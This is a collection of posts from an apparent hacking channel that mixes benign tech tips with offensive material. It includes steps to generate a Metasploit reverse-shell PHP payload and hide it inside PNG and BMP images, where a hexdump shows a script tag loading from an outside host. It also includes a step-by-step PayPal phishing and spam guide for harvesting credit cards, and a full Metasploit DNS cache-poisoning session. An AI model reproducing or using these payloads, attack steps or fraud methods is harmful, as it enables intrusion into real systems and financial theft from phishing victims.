Detailed fresh Proxies List

https://pastebin.com/ePTVVTra

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑IMAGE PAYLOAD- HACK WINDOWS-ANDROID :

F E A T U R E S ::

Bypassing CSP using polyglot JPEGs

Hacking group using Polyglot images to hide malvertising attacks

Encoding Web Shells in PNG IDAT chunks

An XSS on Facebook via PNGs & Wonky Content Types

Revisiting XSS payloads in PNG IDAT chunks

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/chinarulezzz/pixload.git

2) cd pixload

3) If you want to inject a metasploit payload, try something like this:

msfvenom -p php/meterpreter_reverse_tcp \
LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php

4) # Edit payload.php if need.

5) ./pixload/png.pl -payload "$(cat payload.php)" -output payload.png

6) ./bmp.pl [-payload 'STRING'] -output payload.bmp

If the output file exists, then the payload will be injected into the
existing file. Else the new one will be created.
Example

7) ./bmp.pl -output payload.bmp

[>| BMP Payload Creator/Injector |<]

https://github.com/chinarulezzz/pixload


[>] Generating output file
[✔️] File saved to: payload.bmp

[>] Injecting payload into payload.bmp
[✔️] Payload was injected successfully

payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1

00000000 42 4d 2f 2a 00 00 00 00 00 00 1a 00 00 00 0c 00 |BM/*............|
00000010 00 00 01 00 01 00 01 00 18 00 00 00 ff 00 2a 2f |..............*/|
00000020 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d 2f |=1;<script src=/|
00000030 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 63 72 69 70 |/nji.xyz></scrip|
00000040 74 3e 3b |t>;|
00000043

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BYPASS MICROSOFT.COM RESTRICTION DOWNLOAD:

Windows 7 official
https://download.microsoft.com/download/5/1/9/5195A765-3A41-4A72-87D8-200D897CBE21/7601.24214.180801-1700.win7sp1_ldr_escrow_CLIENT_ULTIMATE_x64FRE_en-us.iso

windows 10 official
X 64 https://software-download.microsoft.com/pr/Win10_2004_English_x64.iso?t=b9c74c93-47e9-43b4-b84c-2960a16795b3&e=1602592122&h=9ee311b03b4b846bd513140d2ac7961e

X32 https://software-download.microsoft.com/pr/Win10_2004_English_x32.iso?t=b9c74c93-47e9-43b4-b84c-2960a16795b3&e=1602592122&h=328d4291008d28513bb3944e5a18af54

OFFICE 2019 PRO PLUS OFFICIAL:

https://officecdn.microsoft.com/db/492350F6-3A01-4F97-B9C0-C7C6DDF67D60/media/en-US/ProPlus2019Retail.img

If you need more dm any admin from @Undercode_Testing

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Do you know that your computer is infected with malware?

Symptom 1: Infected with ransomware

This is the most obvious symptom. The ransomware developer needs to clearly tell the target user that they are infected with the ransomware, otherwise how can they make money? If you are unfortunately the target user, then your computer should pop up a Warning box and tell you that your files are all encrypted and you need to pay a ransom for your data to an account before a certain deadline, otherwise you can say goodbye to your files directly.

Symptom 2: Browser redirection

When you use Google to search for the topic "My computer started to exhibit all kinds of strange behaviors", you clicked on a webpage that seemed to meet your search requirements, but the link opened to another webpage. Your first reaction is of course to go back to the Google search results just now, and then try to access other links. But it didn't help much, what happened just now happened again. You find that every link you click is redirected to other websites. If this happens, then congratulations, you are infected with malware.

Symptom 3: The homepage is tampered with

For example, you set your favorite sports news website as the homepage, but don't know why, every time you open your browser, the homepage of Yahoo.com will always pop up. And you also find that there are many new widget icons in the browser window, and these icons can't be deleted. Then please be careful, you are probably infected with malware.

Symptom 4: Pop-up window full of screen

The so-called pop-up window full of screen means that after you close this window, another window pops up again. And when you are not connected to the Internet, your system will continue to pop up various notification windows. Of course, there are many websites that will pop up various advertisements, and these websites will make you feel very disgusted. If all kinds of inexplicable pop-up messages always appear on your screen, then you may have been infected by malicious ads or spyware.


Symptom 5: The computer is running slower and slower

In fact, there are many factors that cause computers to run slower and slower. It may be because you are running too many programs, or you may not have enough storage space on your hard drive. Of course, it may also be because the memory is too small. If for you, none of the above three reasons are true, and your computer is still very slow, then you have probably been recruited.

Don't copy our tutrials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST LINKS EXTRACTOR SOFTWARES (WIN/LINUX)

http://www.softpedia.com/get/Internet/Other-Internet-Related/Fahmy-Link-Manager.shtml

https://www.screamingfrog.co.uk/seo-spider/

https://xsite.informer.com/

http://www.nirsoft.net/utils/addrview.html

https://www.outwit.com/products/hub/

http://www.softpedia.com/get/Office-tools/Other-Office-Tools/Web-Link-Extractor-Linas.shtml

http://www.softpedia.com/get/Internet/E-mail/Mail-Utilities/Power-Email-Address-Extractor.shtml

https://github.com/maraf/LinkExtractor/releases

https://hackertarget.com/extract-links/

Don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How To Spam Paypal

First you need :

1) Mailist
2) Hosting ( Cpanel or Shell )
3) Mailler
4) A good Scam page
5) Email To Receive the Result Spam
6) A Letter

🦑I will explain all of this to you now.
To start spamming, you need to get a mail list (email list).

Where are you sent your spam) Understanding?

Scam Page means a planned website that looks like

Website of Paypal or website of a bank .... , this list of Fraud

You would need to upload it to the hosting scheme and submit it

To get the results from the mail list,

It's the spot you'll upload your skam to

Page to apply it, but now how do I get

This is not very complex, but you need a sum.

Time (you need to hack the website ...) to get it.

Helping you get started
mean the tools needed to send the spam

It is really easy to use it for the mailer, these tools

Enabling you to deliver a letter with the knowledge

You like it (thread title email from the sender ...)

And to encourage you to send spam to one million emails

I'll show you in the next thread with just one press,

Its The letter who you wil send it to the

mailist ,for example if you will spam Paypal account

you need a letter for paypal, this letter is programmed

and it like the original letter of paypal or bank company ..

( Hello , You need To confirm Your paypal Account .... )

you will use it and place it in the spam page

To get your result of spam in your email

That All Now i will explain you The Setup

1) First We need to Get a mailist ( i will show you in the next Post )
then we need a mailler and hosting and we start ,

2) You need to import and put the spam page in the Hosting area.
In order to receive the spam result, your own email in it, then
In the hosting area, you need to upload the mailler script

And now you need to change the sum of things in the letter.

To add your link to your uploaded spam list, you need to

Sending it

3) Here We start spam page and mailler uploaded
in the hosting letter modified with ower informatin ,
Now go to the mailler link and put the mailist and the letter
and the information of sender ( if you will spam paypal account )
you must pute service@paypal.com like email sender
the title of letter is you need to confirm your account .... ) and you start to send spam to the hacked mailist
now you need just to wait to receive the spam result

4) when they access to the scam page and write there information (
credit card ..... ) you will receive it in your own email

Please use all the tools while doing this. Absence of any one toll can either reveal your location or identity or either the paypal spamming will be useless to do and it wont work.

🦑Take care of all the security precautions like:-
RDP
VPN
PROXY
SOCKS5 / 911
etc. to keep yourself anonymous while doing all this.

use for learn only!!
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Kaminsky DNS Cache Poisoning Flaw Exploit for Domains:

This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain. By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache. This insertion completely replaces the original nameserver
records for the target domain.
Example
=======
# /msf3/msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
=[ msf v3.2-release
-- --=[ 298 exploits - 124 payloads
-- --=[ 18 encoders - 6 nops
=[ 73 aux
msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig short -t ns example.com @A.B.C.D
[*] exec: dig short -t ns example.com @A.B.C.D
b.iana-servers.net.
a.iana-servers.net.
msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.
[*] Querying recon nameserver for address of b.iana-servers.net....
[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236
[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.
[*] Querying recon nameserver for address of a.iana-servers.net....
[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43
[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....
[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com
[*] Auxiliary module execution completed
msf auxiliary(bailiwicked_domain) > dig short -t ns example.com @A.B.C.D
[*] exec: dig short -t ns example.com @A.B.C.D
dns01.metasploit.com.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑how do you intercept traffic?
How to position and set up listening equipment?

1) I propose to consider options for the location (connection) of equipment for sniffing in a switched environment (we will consider interception of a wi-fi channel in the next article).
The most convenient way is to install a sniffer directly on the listening host of interest to us.

2) However, some of the traffic that is very useful for research, but not intended for the end device, will be dropped by the network interface and not sent for processing to the system, which means that we will not be able to capture this traffic for further research. This traffic includes broadcast traffic within the operation of the switch.

3) For example, an ARP request is used by hosts to determine the MAC address that corresponds to a specific IP address.

4) Knowing the IP, we send an ARP request in order to match the IP-MAC to all devices within the broadcast domain.

5) However, only the target host is "interested" in receiving such a request; other hosts, as mentioned above, will discard the specified packet.

6) For clarity, using the Cisco Packet racer, consider how a host with an IP address of 192.168.1.2 sends an ARP request to host 192.168.1.4.

Having previously checked that there are no ARP entries on 192.168.1.2 from the word at all with the command arp -a (you can delete them using arp -d), we execute the ping command on 192.168.1.4.

7) Since we do not know the MAC address, we first send an ARP request. The request comes to the switch (cisco 2960), then it is sent to all hosts connected to the switch. After that, host 192.168.1.3 discards the specified one, and 192.168.1.4 responds accordingly.

🦑In order to capture all incoming traffic on 192.168.1.3, you need to enable mixed mode of operation on the network interface . The software components Aircrack-ng, Wireshark, tcp dump, etc. allow you to do this.

When it is not possible to place a traffic analyzer on the target host , a hub can help .

In this case, the host under investigation and the traffic analyzer in the same switched network segment are connected to the same hub.

As a result, all incoming and outgoing packets will pass through all ports of the hub.

For example, by sending packets from Host1 to Host2, Hub0 will send them to both the Host2 under investigation and the Sniffer packet sniffer.

Dropping packets by the Sniffer in the picture is due to the disabled mixed mode of the network adapter.

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WIFI CHANNEL SPEED WIFI ?

1) Are you spending money for high-speed Internet and not getting what you expected? Was your WiFi network working fine and now you're suddenly stuck with slow WiFi data rates? Selecting the proper WiFi channel can significantly improve your WiFi coverage and performance.

2) In the 2.4 GHz band, 1, 6, and 11 are the only non-overlapping channels. Selecting one or more of these channels is an important part of setting up your network correctly. Currently, many wireless routers automatically select the channel for you upon initial setup, where depending on your wireless environment, it could lead to slow WiFi speeds and interference.

3) will describe what interference you're dealing with and takes you through the steps to selecting the right channel, so you can understand why you should choose between channel 1, 6, and 11.


Your not allowed to copy our tutorials!
BY METAgeek
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Let's analyse together: Critical vulnerabilities in the architecture of Intel, AMD and ARM processors :

How fortunate that critical vulnerabilities in the architecture of Intel, AMD and ARM processors were published while we were resting.

1) We did not have time to change the equipment, as recommended by US-CERT, as it turned out that it was enough to update the operating systems.

Well, the manufacturers had time to release updates.

2)So, what is the bottom line at the moment.

There are two vulnerabilities - Meltdown ("Crash") and Specter ("Ghost").

3)Meltdown allows you to break the barrier between applications and the internal memory of the operating system, which opens access to the data stored in the memory of the OS.

Detailed description https://meltdownattack.com/meltdown.pdf.

4)Well, there are also exploits, for example: https://github.com/paboldin/meltdown-exploit.

5)Specter breaks memory isolation between applications themselves: conventionally, one service can crawl into the memory of another.

Description https://spectreattack.com/spectre.pdf. They say exploiting the vulnerability is more difficult, but there are still exploits: https://github.com/crozone/SpectrePoC, https://github.com/Eugnis/spectre-attack.

In general, a nightmare! Update, definitely!

Fears about 30% loss of productivity in practice are not justified

Microsoft:

Windows Server 2008 R2 Service Pack 1, Windows 7 Service Pack 1 - KB4056897 or KB4056894
Windows Server 2012 Standard - KB4056899 or KB4056896
Windows 8.1, Windows Server 2012 R2 Standard - KB4056898 or KB4056895
Windows 10 Enterprise - KB4056893
Windows 10 Version 1607, Windows Server 2016 , Windows 10 Mobile - KB4056890
Windows 10 Version 1703 - KB4056891
Windows 10 version 1709 - KB4056892

🦑There may be problems installing the patch due to the antivirus.

Provided a list of antiviruses that block the patch: BitDefender, Carbon Black, Cisco, CrowdStrike, Cylance, Cyren, Endgame, Fortinet, G-DATA, McAfee, Nyotron, Palo-Alto, SentinelOne, Sophos, Trend Micro, VIPRE, Webroot.

Modifying or creating the following registry key may help resolve the issue:

?
Key="HKEY_LOCAL_MACHINE"Subkey="SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat"
Value Name="cadca5fe-87d3-4b96-b7fb-a231484277cc"
Type="REG_DWORD"
Data="0x00000000"
Very short on performance: tests with the Windows 10 update showed a decrease in various performance parameters by 1-2%.

Details: http://www.guru3d.com/articles-pages/windows-vulnerability-cpu-meltdown-patch-benchmarked.html.

Linux:

Everything is simple, you need a kernel 4.14.12, 4.9.75 or 4.4.110. There are no updates for other branches, but they have a bunch of other unpatched vulnerabilities, so they are not recommended for use.

Apple:

Meltdown has been fixed in iOS 11.2, macOS 10.13.2, and tvOS 11.2. No update is required for watchOS.
Specter, Apple claims, is only practically exploitable via JavaScript in a web browser, so they will keep Safari updated. This patch, as well as the Axis Specter patches, are pending.

Google:

Android with the patch from 2018-01-05 is protected.
Chrome 64 adds Specter protection, but is set to release on January 23rd. For now, if you wish, you can enable Site Isolation to protect against attacks.


Your not allowed to copy our tutorials
!@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Everything you need to know about Google Stadia :
#FastTips


1) On June 12, Google fixed one of the main shortcomings of the Stadia service: it is now available on any Android device, whether it is on the official support list or not. In addition, all OnePlus models from OnePlus 5 will support Stadia.

2) To use Stadia on a device without official support, you need to download the Stadia app, open the “Experiments” tab, click “Play”. The service should work without problems.

3) Last year Google announced the Stream project. This was a limited test built around Assassin's Creed Odyssey. After a short period of testing in January, the project ended and Google said nothing about its future plans to stream games. Stadia was announced at GDC 2019.

4) The idea of ​​streaming is far from new. However, Google's service may turn out to be one of the most ambitious.

Google Stadia is a game streaming service to any user's device. It can be a TV, smartphone, laptop, tablet. In any case, you will be able to access the most advanced games.

How is this possible? Google servers process the image of the games and broadcast it. The user only needs a device with a screen. This gives everyone access to high quality games with high system requirements. Including those who cannot afford to buy an expensive gaming computer or console.

🦑Supported platforms
The cloud service works with a Chromecast Ultra device when connected to a TV. Chrome browser is supported on computers, laptops and tablets, including Chrome OS. Among smartphones, Google Pixel 2, Pixel 3, Pixel 3a and Pixel 4 are supported.

In February, support for the following smartphones appeared:

Samsung Galaxy S8

Samsung Galaxy S8 Plus

Samsung Galaxy S8 Active

Samsung Galaxy Note 8

Samsung Galaxy S9

Samsung Galaxy S9 Plus
..../.......

5) in June it was announced that all Android smartphones will be able to work with Stadia. Even those that are not included in the above list. You can install the Stadia application on them, open the "Experiments" tab and click "Play".

6) Since this is a cloud service, all the heavy processing is done by other people's computers remotely. You can work with a smartphone, tablet or even a weak computer, the quality will be equally high. Users of the service will receive the computing power of a custom AMD 2.7 GHz x86 processor, 16 GB of RAM, data transfer rates up to 484 GB / s and a GPU with a capacity of 10.7 teraflops.

This makes Google's platform more powerful than any game console on the market. In addition, Google will be responsible for updates and users will not have to do anything.

Of course, the quality of the games will depend on your internet connection. Playing on Chromecast Ultra, you can get 4K support with HDR and 5.1 surround sound if you have a TV, sound system, and fast enough internet to support it all.

🦑Can I try Stadia for free?

Yes. Google has announced a two-month free trial for Stadia Pro. Any owner of supported devices can play several games on the service for free. They can buy additional games to play and stream. After the trial period ends, you can renew your Stadia Pro subscription for $ 9.99 per month. You can unsubscribe at any time before the end of the trial period.

Your not allowed to copy our tutorials
!@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WIFI HACKING & TUTORIALS :)

https://www.youtube.com/watch?v=63qZzmGPFLI

https://github.com/FluxionNetwork/fluxion

https://github.com/wifiphisher/wifiphisher
(tutorial https://wifiphisher.org/)

https://www.aircrack-ng.org/

https://www.pcmag.com/how-to/how-to-hack-wi-fi-passwords

https://www.guru99.com/how-to-hack-wireless-networks.html

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑LINUX EXPLOITS :


Highly probable - assessed kernel is most probably affected and there's a very good chance that PoC exploit will work out of the box without any major modifications.

Probable - it's possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target.

Less probable - additional manual analysis is needed to verify if kernel is affected.

Unprobable - highly unlikely that kernel is affected (exploit is not displayed in the tool's output)


🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

2) Details about LES usage and inner workings:

3) https://mzet-.github.io/2019/05/10/les-paper.html
Additional resources for the LES:

https://github.com/mzet-/les-res

4) Purpose
LES tool is designed to assist in detecting security deficiencies for given Linux kernel/Linux-based machine. It provides following functionality:

Assessing kernel exposure on publicly known exploits
Tool assesses (using heuristics methods discussed in details here) exposure of the given kernel on every publicly known Linux kernel exploit. Example of tool output:

5) $ ./linux-exploit-suggester.sh
...
[+] [CVE-2017-16995] eBPF_verifier

Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html

> Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,[ ubuntu=14.04 ]{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04)
> {kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

https://github.com/mzet-/linux-exploit-suggester

don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to get rid of SMS Trojans WinLock (Windows Blocker) :

1) "Get Accelerator" (Trojan-Ransom.Win32.Agent.gc)

The first example of a Trojan ransomware that caused a large-scale outbreak was a malicious product self-named "Get Accelerator". It was entered into the Kaspersky Lab database as Trojan-Ransom.Win32.Agent.gc, Dr. The Web calls it "Trojan.Winlock.366" and BitDefender heuristically identified it as "Gen: Trojan.Heur.Hype.cy4@aSUBebjk ".

We saw the first cases of infection with this program around the middle of October last year. By the beginning of the third decade, there was a sharp surge in infection, which, by the way, was repeated towards the end of the year; epidemic outbreaks are clearly visible on the summary graph of search queries, compiled according to the analytical service LiveInternet.

2) "Get Accelerator" was, in essence, one of the primitive representatives of the "ransomware factory" products. The user was presented with a normal application window without controls, which is relatively easy to make in a visual programming environment, with a couple of threatening labels and a timer; in this case, the correct operation of the network connection was disrupted, which did not allow the user to access the Internet.

3) malware consisted of two components - the driver % WinDir% \ dmgr134.sys and the injectable dynamic link library % system32% \ {991F0AD1-DA5D-4dc3-B0BA-F46BA0F1D3CB} .dll; both components were clearly visible in the results of the study of the AVZ system, their names were fixed, which made it possible to draw up standard recommendations for their removal:

To remove a typical Trojan-Ransom.Win32.Agent.gc (Get Accelerator) from a regular home or office PC, you need to execute a script in AVZ:

<div style = "margin: 20px; margin-top: 5px ">
<div class =" smallfont "style =" margin-bottom: 2px "> Code:
<pre class =" alt2 ″ dir = "ltr" style = "
margin: 0px;
padding: 6px;
border: 1px inset;
width: 640px;
height: 210px;
text-align: left;
overflow: auto "> begin
SearchRootkit (true, true);
SetAVZGuardStatus (true);
QuarantineFile ('% WinDir% \ dmgr134.sys', ");
QuarantineFile ('% System32% \ {991F0AD1-DA5D-4dc3-B0BA-F46BA0F1D3CB} .dll', ");
DeleteFile ('% System32% \ {991F0AD1-DA5D-4dc3-B0BA-F46BA0F1D3CB} .dll');
DeleteFile ('% WinDir% \ dmgr134.sys');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
RebootWindows (true);
end. </pre> The
operating system will reboot.

4) "uFast Download Manager" (Trojan-Ransom.Win32.SMSer.qm, Trojan.Win32.Agent.dapb)

The second representative of the family was the so-called. “UFast Download Manager” named “Trojan-Ransom.Win32.SMSer.qm” and “Trojan.Win32.Agent.dapb” in the databases of Kaspersky Lab and “Trojan.Botnetlog.11” - according to Dr. Web; BitDefender re-identified the malware heuristically, naming it "BehavesLike: Trojan.UserStartup".

The attack by this malicious program occurred in early November, when the first wave of Get Accelerator had already been extinguished. An epidemic surge is clearly visible again on the search query graph, although it was not as powerful as in the previous sample.

don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁